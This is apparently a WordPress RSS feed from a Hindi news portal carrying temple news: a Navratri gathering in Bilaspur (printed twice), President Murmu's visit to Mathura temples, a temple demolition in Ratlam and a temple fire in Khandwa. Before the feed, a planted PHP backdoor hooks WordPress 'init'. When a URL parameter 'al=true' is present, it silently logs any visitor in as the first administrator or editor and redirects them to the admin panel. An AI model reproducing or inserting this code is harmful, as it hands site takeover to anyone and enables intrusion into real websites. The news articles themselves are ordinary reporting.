// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); mandir – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 27 Mar 2026 07:46:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 मां बिरासिनी धाम बिलासपुर में चैत्र नवरात्रि के नवमी के दिन श्रद्धा का उमड़ा सैलाब https://pratyushaashakinayikiran.com/?p=208187 Fri, 27 Mar 2026 07:46:00 +0000 https://pratyushaashakinayikiran.com/?p=208187 मां बिरासिनी धाम बिलासपुर में चैत्र नवरात्रि के नवमी के दिन श्रद्धा का उमड़ा सैलाब 

उमरिया 

उमरिया जिले के बिलासपुर तहसील अंतर्गत के पावन अवसर पर नवमी के दिन माता रानी का भक्ति श्रृंगार किया गया।श्रद्धालुओं के द्वारा माता रानी की विधिवत पूजन आराधना कर ढोल नगाड़े के साथ दंड भरते हुए माता रानी के दरबार में भक्त लोग पहुंचे। और अठवाइन रोट का भोग प्रसाद अर्पित किए। माता रानीके दरबार मैं नवरात्रि पर्व पर प्रतिदिन हजारों श्रद्धालु पहुंच रहे हैं। जो पूजा आराधना के साथ विविध धार्मिक अनुष्ठान कर मनोकामनाएं की पूर्ति कर रहे हैं। माता रानी के कलश ग्रह में जवारे ज्योति कलश की जगमगाहट से पूरा प्रांगण सुभोषित है। माता रानी के दरबार में प्रतिदिन भंडारे का आयोजन किया जाता है।दूर-दूर से लोग पहुंचकर माता रानी के भंडारे का प्रसाद ग्रहण करते हैं।आपको हम बता दें कि कल शनिवार को माता रानी के दरबार में भव्य मनोकामना कलसों का विसर्जन पूरी सुरक्षा व्यवस्था के साथ शाम 5:00 बजे किया जाएगा।मंदिर के पंडा बाबा के द्वारा पूजा पाठ और काली खप्पर की पूजा किया जाएगा।

 

]]>
मां बिरासिनी धाम बिलासपुर में चैत्र नवरात्रि के नवमी के दिन श्रद्धा का उमड़ा सैलाब https://pratyushaashakinayikiran.com/?p=208189 Fri, 27 Mar 2026 07:46:00 +0000 https://pratyushaashakinayikiran.com/?p=208189 मां बिरासिनी धाम बिलासपुर में चैत्र नवरात्रि के नवमी के दिन श्रद्धा का उमड़ा सैलाब 

उमरिया 

उमरिया जिले के बिलासपुर तहसील अंतर्गत के पावन अवसर पर नवमी के दिन माता रानी का भक्ति श्रृंगार किया गया।श्रद्धालुओं के द्वारा माता रानी की विधिवत पूजन आराधना कर ढोल नगाड़े के साथ दंड भरते हुए माता रानी के दरबार में भक्त लोग पहुंचे। और अठवाइन रोट का भोग प्रसाद अर्पित किए। माता रानीके दरबार मैं नवरात्रि पर्व पर प्रतिदिन हजारों श्रद्धालु पहुंच रहे हैं। जो पूजा आराधना के साथ विविध धार्मिक अनुष्ठान कर मनोकामनाएं की पूर्ति कर रहे हैं। माता रानी के कलश ग्रह में जवारे ज्योति कलश की जगमगाहट से पूरा प्रांगण सुभोषित है। माता रानी के दरबार में प्रतिदिन भंडारे का आयोजन किया जाता है।दूर-दूर से लोग पहुंचकर माता रानी के भंडारे का प्रसाद ग्रहण करते हैं।आपको हम बता दें कि कल शनिवार को माता रानी के दरबार में भव्य मनोकामना कलसों का विसर्जन पूरी सुरक्षा व्यवस्था के साथ शाम 5:00 बजे किया जाएगा।मंदिर के पंडा बाबा के द्वारा पूजा पाठ और काली खप्पर की पूजा किया जाएगा।

 

]]>
राष्ट्रपति द्रौपदी मुर्मु ने इस्कॉन और प्रेम मंदिर में की पूजा-अर्चना https://pratyushaashakinayikiran.com/?p=206534 Sat, 21 Mar 2026 06:26:00 +0000 https://pratyushaashakinayikiran.com/?p=206534 राष्ट्रपति द्रौपदी मुर्मु ने इस्कॉन और प्रेम मंदिर में की पूजा-अर्चना

मथुरा
 राष्ट्रपति द्रौपदी मुर्मु अपने तीन दिवसीय मथुरा प्रवास के लिए  कान्हा की नगरी पहुंचीं। कैंट हेलीपैड पर उतरने के बाद राष्ट्रपति ने ब्रज के सुप्रसिद्ध इस्कॉन और प्रेम मंदिर के दर्शन किए। इस दौरान उनके साथ उत्तर प्रदेश की राज्यपाल आनंदीबेन पटेल और उनका परिवार भी मौजूद रहा।

राष्ट्रपति का हेलीकॉप्टर सेना के हेलीपैड पर उतरा। यहां राज्यपाल आनंदीबेन पटेल, कैबिनेट मंत्री लक्ष्मी नारायण चौधरी, प्रभारी मंत्री संदीप सिंह, सांसद तेजवीर सिंह, महापौर विनोद अग्रवाल, लेफ्टिनेंट जनरल वी. हरिहरन, अपर पुलिस महानिदेशक आगरा जोन अनुपम कुलश्रेष्ठ, मंडलायुक्त आगरा नगेन्द्र प्रताप, ग्रुप कैप्टन शिवम मनचंदा और जिलाधिकारी चंद्र प्रकाश सिंह सहित वरिष्ठ प्रशासनिक अधिकारियों ने उनका भव्य स्वागत किया। इसके बाद राष्ट्रपति का काफिला सीधे वृंदावन के लिए रवाना हुआ।

इस्कॉन मंदिर में बच्चों को बांटी चॉकलेट
राष्ट्रपति सबसे पहले वृंदावन स्थित इस्कॉन मंदिर पहुंचीं। मंदिर के 50वें स्वर्ण जयंती वर्ष के अवसर पर उन्होंने राधा- श्यामसुंदर के विग्रह का विधि- विधान से पूजन और आरती की। मंदिर के प्रेसिडेंट पंचगौड़ा दास ने बताया कि राष्ट्रपति मंदिर की साज- सज्जा और भक्तिमय वातावरण से बेहद प्रभावित हुईं। पूजन के उपरांत राष्ट्रपति ने मंदिर परिसर में बच्चों से आत्मीयता से बातकर उन्हें चॉकलेट भेंट की। उन्होंने मंदिर अधिकारियों से कहा कि वे यहां पुनः दर्शन के लिए आना चाहेंगी।

प्रेम मंदिर में निहारा लेजर शो और युगल सरकार की आरती
इस्कॉन के बाद राष्ट्रपति द्रौपदी मुर्मु प्रेम मंदिर पहुंचीं, जहां अजय बाबा और अन्य पदाधिकारियों ने उनका स्वागत किया। राष्ट्रपति ने परिवार के साथ मंदिर में आयोजित विशेष 'वाटर लेजर शो' का आनंद लिया। इसके पश्चात उन्होंने गर्भगृह में श्री राधा-कृष्ण के युगल स्वरूप की आरती उतारी। इस दौरान संकीर्तन मंडली के 51 आश्रमवासियों द्वारा किए गए मधुर गायन ने वातावरण को पूरी तरह कृष्णमय कर दिया। राष्ट्रपति ने मंदिर की परिक्रमा की और प्रथम तल पर स्थित श्री सीता-राम जी के भी दर्शन किए। मंदिर प्रबंधन की ओर से उन्हें प्रसाद, तुलसी माला, दुपट्टा और धार्मिक साहित्य भेंट किया गया।

सुरक्षा के रहे कड़े इंतजाम
राष्ट्रपति द्रौपदी मुर्मु के दौरे को देखते हुए पूरे मथुरा- वृंदावन में सुरक्षा के पुख्ता इंतजाम किए गए थे। एडीजी अनुपम कुलश्रेष्ठ और एसएसपी श्लोक कुमार स्वयं सुरक्षा व्यवस्था की कमान संभाले रहे। राष्ट्रपति का यह दौरा ब्रज की सांस्कृतिक और धार्मिक महत्ता को वैश्विक पटल पर एक नई ऊंचाई प्रदान करने वाला रहा।

]]>
रतलाम में 130 साल पुराने भैरव मंदिर को लेकर विवाद, पड़ोसी पर लगा मंदिर तोड़ने का आरोप https://pratyushaashakinayikiran.com/?p=131483 Sat, 15 Feb 2025 07:57:00 +0000 https://pratyushaashakinayikiran.com/?p=131483 रतलाम
रतलाम में 130 साल पुराने भैरव मंदिर को तोड़ दिया गया। इस घटना से हिंदू संगठनों में आक्रोश है। मंदिर तोड़ने का आरोप पड़ोसी मकान मालिक पर लगा है। मंदिर का मलबा आरोपी के घर के बाहर रखवा दिया गया है। पुलिस ने मामला दर्ज कर आरोपियों की तलाश शुरू कर दी है। हिंदू संगठन मंदिर के पुनर्निर्माण की मांग कर रहे हैं।

जेसीबी से तोड़ा गया मंदिर

रतलाम के ओझाखाली रामगढ़ कॉर्नर पर स्थित भैरव मंदिर को जेसीबी से तोड़ा गया। यह घटना शुक्रवार दोपहर की है। मंदिर लगभग 130 साल पुराना बताया जा रहा है। मंदिर तोड़ने की खबर जैसे ही फैली, वैसे ही बड़ी संख्या में लोग मौके पर जमा हो गए। हिंदू संगठनों ने इस घटना का कड़ा विरोध किया। उन्होंने मंदिर तोड़ने वालों के खिलाफ सख्त कार्रवाई की मांग की।

सूचना मिलते ही एसडीएम अनिल भाना, सीएसपी सत्येंद्र घनघोरिया और माणकचौक थाना प्रभारी अनुराग यादव पुलिस बल के साथ मौके पर पहुंचे। प्रशासन ने लोगों को समझा-बुझाकर शांत किया और उचित कार्रवाई का आश्वासन दिया।

जांच के बाद की जाएगी कार्रवाई

सीएसपी सत्येंद्र घनघोरिया ने कहा कि यह प्राचीन मंदिर था, जिसे तोड़ा गया है। जांच के बाद दोषियों के खिलाफ वैधानिक कार्रवाई की जाएगी। माणकचौक थाना पुलिस ने विजय पिता रमेशचंद्र शर्मा की शिकायत पर अभय पिता श्रेणिक कुमार गांधी और जेसीबी ड्राइवर के खिलाफ मामला दर्ज कर लिया है। थाना प्रभारी अनुराग यादव ने बताया कि दोनों आरोपियों की तलाश की जा रही है और जल्द ही उन्हें गिरफ्तार कर लिया जाएगा।

मूर्ति को बचा लिया गया

गनीमत रही कि मंदिर तोड़ने के दौरान भैरव जी की मूर्ति को समय रहते बचा लिया गया। गुस्साए लोगों ने मंदिर का मलबा जेसीबी से उठवाकर आरोपी के घर के बाहर रखवा दिया। इस दौरान आरोपी के घर की महिलाओं ने विरोध किया, लेकिन पुलिस ने स्थिति को संभाल लिया।

पड़ोसी मकान मालिक पर तोड़ने का आरोप

हिंदू संगठनों का कहना है कि भैरव मंदिर 130 साल पुराना था। मंदिर में एक प्याऊ भी थी, जहां लोगों को पानी मिलता था। मंदिर तोड़ने का आरोप पड़ोसी मकान मालिक पर लगा है, जिसका नाम अभी तक सार्वजनिक नहीं किया गया है।

बजरंग दल के रामबाबू शर्मा ने कहा कि मंदिर के स्थान पर दुकान निकालने की साजिश के तहत यह तोड़फोड़ की गई है। हमारी मांग है कि मंदिर को पुनः उसी स्थान पर बनाया जाए और प्याऊ को भी पुनः संचालित किया जाए।

आरोपी के घर के सामने रखवा दिया मलबा

पुलिस ने मंदिर का मलबा हटाने के लिए जेसीबी मंगवाई थी, लेकिन हिंदू संगठनों के विरोध के कारण मलबा आरोपी के घर के सामने ही रखवा दिया गया। इस घटना के बाद से इलाके में तनाव का माहौल है। हिंदू संगठन सख्त कार्रवाई और मंदिर के पुनर्निर्माण की मांग पर अड़े हुए हैं। पुलिस और प्रशासन ने इलाके में सुरक्षा बढ़ा दी है ताकि शांति व्यवस्था बनी रहे।

]]>
खंडवा में जल कर राख हुआ 500 साल पुराना श्री राम मंदिर, मूर्तियों समेत सारा सामान जलकर खाक https://pratyushaashakinayikiran.com/?p=114857 Sat, 28 Dec 2024 18:26:00 +0000 https://pratyushaashakinayikiran.com/?p=114857 खंडवा

मध्य प्रदेश के खंडवा जिले के भामगढ़ स्थित श्री राम मंदिर में शुक्रवार की देर रात आग लग गई। मंदिर में आग लगने के बाद पहले ग्रामीणों ने आग बुझाने की कोशिश की। लेकिन, जब आग नियंत्रित नहीं हुई तो फायर ब्रिगेड की मदद ली गई। पुलिस के मुताबिक मंदिर में आग कैसे लगी यह बात स्पष्ट नहीं हो पाई है। इस अग्निकांड में किसी तरह की जनहानि नहीं हुई है, मंदिर में रखा सामान जरूर बड़ी तादाद में जल गया है। अग्निकांड के समय मंदिर में कोई था अथवा नहीं पुलिस इस बात की जानकारी जुटा रही है।

आज सुबह आग पर पाया गया काबू

जानकारी के अनुसार, भामगढ़ में लगभग 500 साल पुराना श्री राम मंदिर है। इस मंदिर में शुक्रवार की देर रात को अचानक आग लग गई, महज कुछ ही देर में आग ने विकराल रूप ले लिया। ग्रामीणों ने काफी देर तक आग बुझाने की कोशिश की, मगर उनके प्रयास सफल नहीं हुए। परिणाम स्वरूप फायर ब्रिगेड की गाड़ी बुलाना पड़ी और शनिवार की सुबह तक इस आग पर काबू पाया जा सका।

आसपास के मकान कराए गए खाली

बताया गया है कि इस पुराने मंदिर का लकड़ी का शेड और काफी पुरानी दीवार होने के कारण आग तेजी से भड़की। आग इतनी ज्यादा थी कि आसपास के मकानों को भी खाली करना पड़ा। आग कैसे लगी इस बात का खुलासा नहीं हो पाया है। इस अग्निकांड में मंदिर में रखी सामग्री जलकर खाक हो गई है।

ग्रामीणों ने मंदिर परिसर से धुआं उठता देखा

स्थानीय लोगों के मुताबिक शाम तक मंदिर में दर्शन करने भी बड़ी संख्या में लोग गए थे। देर रात लगभग ढाई बजे मंदिर परिसर से ग्रामीणों ने धुंआ उठते हुए देखा और फिर कुछ ही देर में आग ने आग की तेज लपटों दिखाई देने लगी। आग को बुझाने के लिए ग्रामीणों ने हर तरफ से पानी डाला गया मगर सफलता नहीं मिली। बाद में, फायर ब्रिगेड की मदद से इस आग को बुझाया जा सका।

]]>